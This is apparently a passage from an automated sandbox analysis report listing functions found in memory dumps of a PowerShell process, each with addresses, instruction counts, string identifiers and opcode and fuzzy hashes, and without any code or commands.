                                                                        • Instruction Fuzzy Hash: 65E1B2B4A00219DFCB14DB68C451BAEBBB2AFC8705F14C429D919AF385CB76EC45CB91
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 07A40BC8 Relevance: 4.1, Strings: 3, Instructions: 324COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.2061520810.0000000007A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A40000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_7a40000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: $qq$$qq$$qq
                                                                        • API String ID: 0-3876402241
                                                                        • Opcode ID: 6317f0d76e7b3a2099c740198ffd85b9a65dbbe0e3c21bd5ee1122f83cfb4c6a
                                                                        • Instruction ID: 87f9bdea922b1c76f60600bdce9075c1d00400b50c66b48fc4b3b3d35b0f311e
                                                                        • Opcode Fuzzy Hash: 6317f0d76e7b3a2099c740198ffd85b9a65dbbe0e3c21bd5ee1122f83cfb4c6a
                                                                        • Instruction Fuzzy Hash: 7EA16CB1308316DFCB258B698841677BBA6AFC1321F24C4AAD669CF291CB37DC45D760
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 07A43510 Relevance: 3.8, Strings: 2, Instructions: 1350COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.2061520810.0000000007A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A40000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_7a40000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 4'qq$4'qq
                                                                        • API String ID: 0-2334807182
                                                                        • Opcode ID: fb7e7ebc7ce5164afa8408b9b4daaedc1756d176de0de4db44f5d84f8586a796
                                                                        • Instruction ID: eed677514d69d1245466da6dbc3c7bae3aaa75647ac0abb9792dbb5d4451f1c4
                                                                        • Opcode Fuzzy Hash: fb7e7ebc7ce5164afa8408b9b4daaedc1756d176de0de4db44f5d84f8586a796
                                                                        • Instruction Fuzzy Hash: 6AC27EB4A00214DFDB14CB58C841B6EBBB2AFC9315F64C469E9199F395CB72EC46CB81
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 07A48626 Relevance: 2.9, Strings: 2, Instructions: 425COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.2061520810.0000000007A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A40000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_7a40000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 4'qq$4'qq
                                                                        • API String ID: 0-2334807182
                                                                        • Opcode ID: 13ac26b4f2914144e5e0b4e9c7bc7a66caf524fa4c27a416e41f9b05f4d268a1
                                                                        • Instruction ID: cff24d19bd79827440adc36b128c00125e3b1725db75ce088cbf2b21b152ce4b
                                                                        • Opcode Fuzzy Hash: 13ac26b4f2914144e5e0b4e9c7bc7a66caf524fa4c27a416e41f9b05f4d268a1
                                                                        • Instruction Fuzzy Hash: 940281B0A012149FC724DB58C851BAABBB2EFC5305F5184A4DA099F381CB76ED86CFD1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 07A44BC1 Relevance: 2.8, Strings: 2, Instructions: 322COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.2061520810.0000000007A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A40000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_7a40000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 4'qq$4'qq
                                                                        • API String ID: 0-2334807182
                                                                        • Opcode ID: 4a60213edcaa3f08b2a2712b01b44ed551419717acbcde3c2d4e7daf949ceb70
                                                                        • Instruction ID: d07c4327d903ccc2a05d747e0167970fc193f0029ab15434ff5d73856ee6fabd
                                                                        • Opcode Fuzzy Hash: 4a60213edcaa3f08b2a2712b01b44ed551419717acbcde3c2d4e7daf949ceb70
                                                                        • Instruction Fuzzy Hash: 96C1BCB4A00255DFCB18DB68C480BAEBBB2AFC8704F15C559E9186F385CB76EC45CB91
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 07A4C5ED Relevance: 2.6, Strings: 2, Instructions: 132COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.2061520810.0000000007A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A40000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_7a40000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 4'qq$4'qq
                                                                        • API String ID: 0-2334807182
                                                                        • Opcode ID: 9442da2a27634b44cf95ab89d201aa134b9f5c95bfe6b0449799f9931267a596
                                                                        • Instruction ID: cef88e43f452df4ca7037d9a66f9b969aa11712c6076580eb0be3903c6f8f7e9
                                                                        • Opcode Fuzzy Hash: 9442da2a27634b44cf95ab89d201aa134b9f5c95bfe6b0449799f9931267a596
                                                                        • Instruction Fuzzy Hash: 6F414DF1B022119BDF155768945127EF792ABC4631F20843AD929CB385EF37D841CBB1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 07A43E3E Relevance: 2.4, Strings: 1, Instructions: 1102COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.2061520810.0000000007A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A40000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_7a40000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 4'qq
                                                                        • API String ID: 0-1915349394
                                                                        • Opcode ID: ed1a6e80a6bc2c7ae801f30f0d4b476b204c39f3efc70c9345f29ad5c36aa8be
                                                                        • Instruction ID: ad5f35df2f98b7f025193a9462b0fb11f4001dd5cb0ae74a011bab5596fcec6a
                                                                        • Opcode Fuzzy Hash: ed1a6e80a6bc2c7ae801f30f0d4b476b204c39f3efc70c9345f29ad5c36aa8be
                                                                        • Instruction Fuzzy Hash: A6A25FB4A00214DFDB24CB58C841BA9BBB2AFC9315F54C1A9E9199F395CB72EC45CF81
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 07A4350F Relevance: 1.8, Strings: 1, Instructions: 571COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.2061520810.0000000007A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A40000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_7a40000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 4'qq
                                                                        • API String ID: 0-1915349394
                                                                        • Opcode ID: 59ad4db98e74c0cf8c1fa5c0b3031d3175c894739f266e69b074528bd5eaedb0
                                                                        • Instruction ID: d528f4e2048ac6ff5b58fef6c66d33f637755150a52b28e0afad26a018270d99
                                                                        • Opcode Fuzzy Hash: 59ad4db98e74c0cf8c1fa5c0b3031d3175c894739f266e69b074528bd5eaedb0
                                                                        • Instruction Fuzzy Hash: 74327FB4A00215DFDB24CB58C841BA9BBB2AFC8315F54C5A9D919AF381CB72EC45CF91
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 07A48CCE Relevance: 1.8, Strings: 1, Instructions: 559COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.2061520810.0000000007A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A40000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_7a40000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 4'qq
                                                                        • API String ID: 0-1915349394
                                                                        • Opcode ID: 42ab0f723c23ba26109bd8358cce152ef73c10ab4833fd8326d1eadc0cacfd96
                                                                        • Instruction ID: ace28dc7ed4eb072649d2e666a1afb8fc0b6d36bac49de0a1df44e6e36f295cb
                                                                        • Opcode Fuzzy Hash: 42ab0f723c23ba26109bd8358cce152ef73c10ab4833fd8326d1eadc0cacfd96
                                                                        • Instruction Fuzzy Hash: D33280B4A01214DFC724DB58C841BAABBB2ABC5305F51C0A5DA099F391CB76ED86CFD1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 07A43F47 Relevance: 1.7, Strings: 1, Instructions: 432COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.2061520810.0000000007A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A40000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_7a40000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 4'qq
                                                                        • API String ID: 0-1915349394
                                                                        • Opcode ID: fd6cde966d6b53306a77712574dd5f9716a7d7c2cb14abc49837f4e087e8465c
                                                                        • Instruction ID: 19d9e0e60470ec3bc9b892dfd1c96d4b6e76c5f1d7bb49277f66ef49632b654b
                                                                        • Opcode Fuzzy Hash: fd6cde966d6b53306a77712574dd5f9716a7d7c2cb14abc49837f4e087e8465c
                                                                        • Instruction Fuzzy Hash: 71026FB4A00314DFDB24DB58C841BA9BBB2ABC8315F54C599D909AF381CB72EC85CF91
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 07A48DB5 Relevance: 1.7, Strings: 1, Instructions: 406COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.2061520810.0000000007A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A40000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_7a40000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 4'qq
                                                                        • API String ID: 0-1915349394
                                                                        • Opcode ID: e5ebccdbab24a00a6f2f10821a63ec0bcbf0462dee7c32034b7b23d67b3ef9cb
                                                                        • Instruction ID: cde5606119dbdc1da0902b247b4b497695fb14bf2db2784b241c13290f136d82
                                                                        • Opcode Fuzzy Hash: e5ebccdbab24a00a6f2f10821a63ec0bcbf0462dee7c32034b7b23d67b3ef9cb
                                                                        • Instruction Fuzzy Hash: C20281B4B012149FC724DB58C851BAABBB2EBC5305F5184A4DA099F381CB76ED86CFD1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 04BDF0FC Relevance: 1.5, Strings: 1, Instructions: 282COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.2057181541.0000000004BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BD0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_4bd0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: \V7k
                                                                        • API String ID: 0-2194220512
                                                                        • Opcode ID: d620ec3a8d8ef41a76642ddd964797892fc3ea7c3621946d808df706fb64a035
                                                                        • Instruction ID: 1f89ff57d86721e502bfb47b0742b9c3897a5cbeaa767bbe9a77fd29b87df14c
                                                                        • Opcode Fuzzy Hash: d620ec3a8d8ef41a76642ddd964797892fc3ea7c3621946d808df706fb64a035
                                                                        • Instruction Fuzzy Hash: 52B14A70E042099FDF14CFA8D8857ADBBF2EF88314F1481A9E816A7254EB74A845CF91
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 07A4C62F Relevance: 1.4, Strings: 1, Instructions: 104COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.2061520810.0000000007A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A40000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_7a40000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 4'qq
                                                                        • API String ID: 0-1915349394
                                                                        • Opcode ID: 1be5923c4d4322d25a9479eded76809927ad3b95f886cb48e4df89aff1005201
                                                                        • Instruction ID: fb206bda157000003b849d5b0c982e26de01949e8e115cbe3b5bdf9d19c0aa5e
                                                                        • Opcode Fuzzy Hash: 1be5923c4d4322d25a9479eded76809927ad3b95f886cb48e4df89aff1005201
                                                                        • Instruction Fuzzy Hash: 60313BF0B032129BDB209B64840037EBBA2ABC1670F549075D528DB281EB37D885CFF6
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 04BDC59C Relevance: 1.3, Strings: 1, Instructions: 77COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.2057181541.0000000004BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BD0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_4bd0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: I7k
                                                                        • API String ID: 0-510898141
                                                                        • Opcode ID: 9c953d8a8759bee56083ab70cbfddbee6c74f28dab411b027d7a3e5eb00bf200
                                                                        • Instruction ID: f016ef83cb6934296e692779336f3ac25cdfdd7ca7b572bd0ea959355bd37c14
                                                                        • Opcode Fuzzy Hash: 9c953d8a8759bee56083ab70cbfddbee6c74f28dab411b027d7a3e5eb00bf200
                                                                        • Instruction Fuzzy Hash: AD313030B002688BCB25AB34C855BEEBBB6AF49348F0044F9D5099B265DF399E45CF81
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 07A441A9 Relevance: .5, Instructions: 516COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.2061520810.0000000007A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A40000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_7a40000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: b639f7cd794a35c8476036c5b02f18ea8dcfb08446bcf78c9d0f1fbee713af7e
                                                                        • Instruction ID: e492e0559f44b200e75ec5afa0566eb009d385154251b6a65a10a67f666ba3f0
                                                                        • Opcode Fuzzy Hash: b639f7cd794a35c8476036c5b02f18ea8dcfb08446bcf78c9d0f1fbee713af7e
                                                                        • Instruction Fuzzy Hash: B8225BB4A01245DFDB14CB88C480B6ABBB2FFC9314F65C069E9199B755CB72EC46CB81
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 07A41718 Relevance: .5, Instructions: 484COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.2061520810.0000000007A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A40000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_7a40000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: af50243ab07b9f43cedd2453267423873a514515504db5f138923255f0d6444c
                                                                        • Instruction ID: 9e351553c1be0d1ba36579a73e27805d56844902caf687dc0bd207bb1ccbfa57
                                                                        • Opcode Fuzzy Hash: af50243ab07b9f43cedd2453267423873a514515504db5f138923255f0d6444c
                                                                        • Instruction Fuzzy Hash: 3F125BB4B00219DFCB14CB98C441A6EBBF2BBCA315F64C069D9199B755CB32EC85CB91
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 07A4484C Relevance: .5, Instructions: 465COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.2061520810.0000000007A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A40000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_7a40000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 378ad09577c851ece8ea6e734c1f647a1354762da6bdd3ea9a838345de9bec6f
                                                                        • Instruction ID: 41a671c1ec28e6a0296b0264ca4be380380d13557cc4db88fa6122489da667e9
                                                                        • Opcode Fuzzy Hash: 378ad09577c851ece8ea6e734c1f647a1354762da6bdd3ea9a838345de9bec6f
                                                                        • Instruction Fuzzy Hash: 831269B5A01245DFDB14CB88C481F6ABBB2BFC9314F64C069E9189B755CB72EC46CB81
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 07A41BE6 Relevance: .4, Instructions: 422COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.2061520810.0000000007A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A40000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_7a40000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 1ea97a893ef91ac1851ae42d71b16a5d3bbe2951e060b83b25aba48719e910fb
                                                                        • Instruction ID: 506f13e17ab97f6e9f925664d201adbceea5c5780619edc10cb243580ce216d9
                                                                        • Opcode Fuzzy Hash: 1ea97a893ef91ac1851ae42d71b16a5d3bbe2951e060b83b25aba48719e910fb
                                                                        • Instruction Fuzzy Hash: 2C026AB4B00209DFDB14CB98C541EAABBB2FBC5315F54C069E919AB351CB72EC85CB91
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 07A416FE Relevance: .4, Instructions: 401COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.2061520810.0000000007A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A40000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_7a40000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 0916cdd56082940471d90f720d8a357866ef00e6f49291279d118867a06a3397
                                                                        • Instruction ID: 2c82dd7b0005dd73b1b55a9fdc60f394401abd7fbec228c5b3c48b941af00e76
                                                                        • Opcode Fuzzy Hash: 0916cdd56082940471d90f720d8a357866ef00e6f49291279d118867a06a3397
                                                                        • Instruction Fuzzy Hash: 3AF14CB4A00219DFDB14CB88C541EAABBB2FBC9315F54C169E918AB355C732EC85CF91
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 04BDAEF0 Relevance: .4, Instructions: 370COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.2057181541.0000000004BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BD0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_4bd0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: f032d48e10ce1c574cb58bb573887d24cbb7614aebdb32f7205ec4aa00c8a5de
                                                                        • Instruction ID: 72ab4cb3d269aa0a5317df097906223f46ddf4fd34dedc2cbf778c12a594e2f4
                                                                        • Opcode Fuzzy Hash: f032d48e10ce1c574cb58bb573887d24cbb7614aebdb32f7205ec4aa00c8a5de
                                                                        • Instruction Fuzzy Hash: 35E12775A052199FDB05CF98D884AADBBF2FF88320F258599E804AB355D731FD81CB90
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 04BDF9CD Relevance: .3, Instructions: 264COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.2057181541.0000000004BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BD0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_4bd0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 7b10e4dfc300eca05693bf84da6c0d33ff3f20d73b75b2453798f3c0073fe8eb
                                                                        • Instruction ID: 2f172bdf098736d514df142a1c7e14c0b708ff5fa1a48a2ab7b208580daafe82
                                                                        • Opcode Fuzzy Hash: 7b10e4dfc300eca05693bf84da6c0d33ff3f20d73b75b2453798f3c0073fe8eb
                                                                        • Instruction Fuzzy Hash: A7B17070E04609DFDB14CFA8D9817ADBBF1EF48314F2485A9E816E7254FB74A841CB81
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 04BD7424 Relevance: .3, Instructions: 263COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.2057181541.0000000004BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BD0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_4bd0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 0b94836574d990fdc26e82d5b4bd8c22e417148170e1d351244a9961ead8a254
                                                                        • Instruction ID: 3c44b708614348b369c95c8e6817c2f7f01e9be062bc27d9e5d398750cbfa695
                                                                        • Opcode Fuzzy Hash: 0b94836574d990fdc26e82d5b4bd8c22e417148170e1d351244a9961ead8a254
                                                                        • Instruction Fuzzy Hash: B6A17F35A002089FDB14EFA5D944A9DBBF2FF84304F1185A9E806AF354EB75ED49CB80
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 07A454E2 Relevance: .2, Instructions: 222COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.2061520810.0000000007A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A40000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_7a40000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 020dbb5d1e6c3fb812d6b82bc5df11735d2200cf414b5244ccc57b3594b22574
                                                                        • Instruction ID: 4641d30db1aedfaa7dbbce7ca7f4c97760d8cb985ee3dd107946a2175703255c
                                                                        • Opcode Fuzzy Hash: 020dbb5d1e6c3fb812d6b82bc5df11735d2200cf414b5244ccc57b3594b22574
                                                                        • Instruction Fuzzy Hash: 34714DF1F043169FCB249B68884127EFBE5AFC5250F18847AD815CB641EB37D951CBA2
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 04BD2AA0 Relevance: .2, Instructions: 211COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.2057181541.0000000004BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BD0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_4bd0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: a125450052b89e3542d0faf4d3ad4ef8af263073385b86161533d46210652439
                                                                        • Instruction ID: a8cce3bd73759596dd44b4e96323a3dff829bd6f836214951fa5a4e4d5b965ca
                                                                        • Opcode Fuzzy Hash: a125450052b89e3542d0faf4d3ad4ef8af263073385b86161533d46210652439
                                                                        • Instruction Fuzzy Hash: 2B918F74A006498FCB09CF58C494AAEFBB1FF88310B2486E9D815AB3A5D735FC51CB90
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 07A4C985 Relevance: .2, Instructions: 210COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.2061520810.0000000007A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A40000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_7a40000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 06a1f0e656d12de1b5e882afa816a8e492508ee29a1099bc4088c0704b1215a9
                                                                        • Instruction ID: ca91dd74432d3ca2aab662c4f978ba7ef52daa7b00bbe2120ddca6fa28b2b7b2
                                                                        • Opcode Fuzzy Hash: 06a1f0e656d12de1b5e882afa816a8e492508ee29a1099bc4088c0704b1215a9
                                                                        • Instruction Fuzzy Hash: F2815CB5A01205DFCB14CF54C494AAABBB2EBC9324F55C169D819AB355C733EC42CFA0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 04BD7CDE Relevance: .2, Instructions: 188COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.2057181541.0000000004BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BD0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_4bd0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 6d5fd2721769067c319d65260705df3219845d19523845a769036a9a52902695
                                                                        • Instruction ID: 1104cf0ebb1b8f4ae72be6590be2d6e8bec203bd553c84716b41cd649e25afac
                                                                        • Opcode Fuzzy Hash: 6d5fd2721769067c319d65260705df3219845d19523845a769036a9a52902695
                                                                        • Instruction Fuzzy Hash: C9715D70A006099FDB14DFA4D884AEDBBF2FF88304F1484A9D406AB794DF74AD4ACB51
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 04BD7B5B Relevance: .2, Instructions: 165COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.2057181541.0000000004BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BD0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_4bd0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: de60a3a1b91ca378d8fc1caf7ee0a3553521f0966275919448093a3656da45ed
                                                                        • Instruction ID: cb9b9dc196b6a43aa27a28c0c9f0cd11670eabe609fe80e90a0b47953a6609f1
                                                                        • Opcode Fuzzy Hash: de60a3a1b91ca378d8fc1caf7ee0a3553521f0966275919448093a3656da45ed
                                                                        • Instruction Fuzzy Hash: 83617D70A006099FCB14DF68C894ADDBBF2FF85314F14C5A9D4069B755EB71AC46CB90
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 07A4E93F Relevance: .1, Instructions: 142COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.2061520810.0000000007A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A40000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_7a40000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: d1928c27ea46c6d6b1d593b3b218ab93eef47e61193308cb2711783cc96e0642
                                                                        • Instruction ID: ce0c0fb5be205e7a0607bf22d3dfb6bca74b853de3dcebe552aaf9a046c983c2
                                                                        • Opcode Fuzzy Hash: d1928c27ea46c6d6b1d593b3b218ab93eef47e61193308cb2711783cc96e0642
                                                                        • Instruction Fuzzy Hash: C34145F2708212CBDB119778881166ABBA2BFC1326B14C4BAD9158F791CF33DD45C7A2
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 04BD7901 Relevance: .1, Instructions: 122COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.2057181541.0000000004BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BD0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_4bd0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 2f31ea0b0051e2d5c1526015d22d5e3a1d14faca0715039479dc730fb59c8626
                                                                        • Instruction ID: b17fef91dd492868392d8f012a3be636b7b85c171fbb676ccd64e178b93127eb
                                                                        • Opcode Fuzzy Hash: 2f31ea0b0051e2d5c1526015d22d5e3a1d14faca0715039479dc730fb59c8626
                                                                        • Instruction Fuzzy Hash: 2E41A1317006059FDB15EF74D498AAA7BF2EF89700F1880A9E406EB3A4DF34AC41CB90
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 04BDB1F7 Relevance: .1, Instructions: 117COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
